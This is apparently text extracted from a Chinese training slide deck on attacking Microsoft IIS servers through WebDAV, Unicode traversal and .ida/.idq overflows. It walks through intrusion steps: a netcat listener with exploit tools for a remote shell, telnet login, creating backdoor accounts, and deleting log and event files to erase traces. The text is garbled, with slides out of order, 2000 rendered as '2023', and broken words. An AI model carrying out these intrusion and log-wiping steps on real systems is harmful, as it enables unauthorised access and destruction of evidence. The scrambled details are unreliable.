【正文】 止對(duì) Inter請(qǐng)求的相應(yīng)或執(zhí)行任意命令。 Neusoft Institute of Information 2023年 9月 2日 IT Education Training WindowsMedia服務(wù) 沖區(qū)溢出漏洞 ? 影響系統(tǒng)： windows 2023/2023 ? 描述： Microsoft Windows媒體服務(wù)，支持通過(guò)多播流從網(wǎng)絡(luò)上傳送媒體內(nèi)容給客戶端。通常來(lái)說(shuō)， dos不需要遠(yuǎn)程服務(wù)器存在任何漏洞，完全是惡意攻擊，入侵者得不到任何權(quán)限。 Neusoft Institute of Information 2023年 9月 2日 IT Education Training Neusoft Institute of Information 2023年 9月 2日 IT Education Training 實(shí)例 ? 使用 Webdavx3對(duì)中文版的 IIS5進(jìn)行WebDAV漏洞溢出 – 使用 WebDAVScan掃描 WebDAV漏洞 – 使用 Webdavx3對(duì)遠(yuǎn)程 IIS5進(jìn)行溢出 – 使用 tel或者 nc遠(yuǎn)程登錄服務(wù)器 – 建立后門賬號(hào) – 退出 Neusoft Institute of Information 2023年 9月 2日 IT Education Training 安全解決方案 ? 安裝微軟提供的相關(guān)補(bǔ)丁 Neusoft Institute of Information 2023年 9月 2日 IT Education Training WebDAV超常請(qǐng)求遠(yuǎn)程拒絕服務(wù)攻擊漏洞 ? Microsoft IIS WebDAV超常請(qǐng)求遠(yuǎn)程拒絕服務(wù)攻擊漏洞 ? 影響系統(tǒng)： ? 描述： WebDAV的支持，WebDAV可以通過(guò) HTTP向用戶提供遠(yuǎn)程文件存儲(chǔ)的服務(wù)。 Neusoft Institute of Information 2023年 9月 2日 IT Education Training 漏洞檢測(cè) ? WebDAVScan是紅盟編寫的專門用于檢測(cè) WebDAV漏洞的專用掃描器，可以掃描一個(gè) IP段，并可以返回遠(yuǎn)程服務(wù)的 Web服務(wù)器版本。 ? 該漏洞可以使 win200產(chǎn)生緩沖區(qū)溢出并以IWAM_putername用戶的權(quán)限執(zhí)行任意代碼。 Neusoft Institute of Information 2023年 9月 2日 IT Education Training 實(shí)例 2：擦腳印 ? 在客戶端 IE瀏覽器中利用 Unicode編碼漏洞，使用下列命令清除日志文件： – Del+c:\winnt\system32\logfiles\*.* – Del+c:\winnt\system32\config\*.evt – Del+c:\winnt\system32\dtclog\*.* – Del+c:\winnt\system32\*.log – Del+c:\winnt\system32\*.txt – Del+c:\winnt\*.txt – Del+c:\winnt\*.log Neusoft Institute of Information 2023年 9月 2日 IT Education Training 實(shí)例 3： Unicode綜合利用 ? ASP工具 —海陽(yáng)頂端網(wǎng)木馬，是一套 asp在線的網(wǎng)頁(yè)編輯軟件，支持在線更改、編輯、刪除任意文本文件，是無(wú)組件 asp上傳。不過(guò)Unicode漏洞并不是遠(yuǎn)程溢出漏洞，不能拿到管理員權(quán)限的 shell，只能進(jìn)行簡(jiǎn)單的文件類操作。因此只要入侵者能夠狗仔出適當(dāng)?shù)淖址纭?/‖ ―\‖，就可以利用“ ../‖來(lái)遍歷與 Web根目錄處在一個(gè)邏輯驅(qū)動(dòng)器上的目錄，從而導(dǎo)致“非法遍歷 ‖。 Neusoft Institute of Information 2023年 9月 2日 IT Education Training 安全解決方案 ? 打補(bǔ)丁，微軟已經(jīng)發(fā)布了針對(duì)該漏洞的補(bǔ)丁 Neusoft Institute of Information 2023年 9月 2日 IT Education Training Unicode目錄遍歷漏洞 ? 微軟 Unicode目錄遍歷漏洞 ? 影響系統(tǒng)： win2023 及 ? 都存在利用擴(kuò)展 Unicode字符取代“ /‖和“ \‖而能利用“ ../‖目錄遍歷的漏洞。 Neusoft Institute of Information 2023年 9月 2日 IT Education Training 入侵實(shí)例 ? 使用 [nc –l –p 250]在本地開(kāi)一個(gè)監(jiān)聽(tīng)端口 ? 使用 [iis5exploit TIP LIP LPort]對(duì)遠(yuǎn)程主機(jī)進(jìn)行漏洞溢出。該攻擊可以使 Web服務(wù)器停止響應(yīng)。當(dāng)遠(yuǎn)程服務(wù)器溢出后，便會(huì)在指定的端口得到一個(gè)Tel權(quán)限 ? Idahack host port type shellport ? 類型： ? 中文 win200 1 ? 中文 win200 sp1 2 ? 中文 win200 sp2 3 Neusoft Institute of Information 2023年 9月 2日 IT Education Training 入侵思路 ? 掃描遠(yuǎn)程服務(wù)器，先用 Xscan掃描，然后手工炎癥 ? 使用 [idahack IP 80 1 520]進(jìn)行溢出 ? 成功后，使用 [tel IP 520]遠(yuǎn)程登錄服務(wù)器 ? 使用上一章所講方法建立后門帳號(hào) ? exit退出 Neusoft Institute of Information 2023年 9月 2日 IT Education Training IDQ入侵實(shí)例 ? IISIDQ是 snake編寫的 IDQ溢出工具，有命令行和圖形界面兩種方式，而且溢出成功后可以選擇兩種入侵方式 – Iisidq type ip port 1 lport [命令 1] – Iisidq type ip port 2 ip lport [命令 1] – 類型： ? 0iis5中文 win2023 ? 1iis5中文 win2023 sp1 ? 2iis5中文 win2023 sp2 Neusoft Institute of Information 2023年 9月 2日 IT Education Training 溢出后的連接工具 nc ? Nc在網(wǎng)絡(luò)攻擊中素有 ―瑞士軍刀 ‖的美譽(yù)，是入侵者經(jīng)常使用的工具之一。 Neusoft Institute of Information 2023年 9月 2日 IT Education Training ? 關(guān)于溢出漏洞 – .ida.idq漏洞 – Painter漏洞 – Unicode漏洞 – .asp映射分塊編碼漏洞 ? Webdav漏洞 ? 關(guān)于擴(kuò)展引發(fā)的漏洞 – Windows Media服務(wù) 洞 – Microsoft Frontpage Server Extensions遠(yuǎn)程緩沖區(qū)溢出漏洞 Neusoft Institute of Information 2023年 9月 2日 IT Education Training 搜集 IIS信息 ? 通過(guò) [tel 目標(biāo) IP 80]搜集 Web服務(wù)器版本信息 ? 在 tel連上之后需要連敲兩次回車才能得到信息 ? 通過(guò) [tel 目標(biāo) IP 21]搜集 FTP服務(wù)器版本信息 Neusoft Institute of Information 2023年 9月 2日 IT Education Training .ida.idq漏洞 ? 漏洞描述 ? IIS的 index server .ida/.idq ISAPI擴(kuò)展存在緩沖區(qū)溢出漏洞 ? 影響系統(tǒng) ? Index Server可以加快 Web的搜索能力，提供對(duì)管理員腳本和 Inter數(shù)據(jù)的查詢，默認(rèn)支持管理腳本 .ida和查詢腳本 .idq，不過(guò)都是使用 。通過(guò) IIS， windows系統(tǒng)可以方便的提供 Web服務(wù)、 FTP服務(wù)和 SMTP服務(wù)等。Neusoft Institute of Information 2023年 9月 2日 IT Education Training 基于服務(wù)器軟件漏洞的入侵 ? 隨著計(jì)算機(jī)應(yīng)用的進(jìn)一步普及和計(jì)算機(jī)網(wǎng)絡(luò)的高速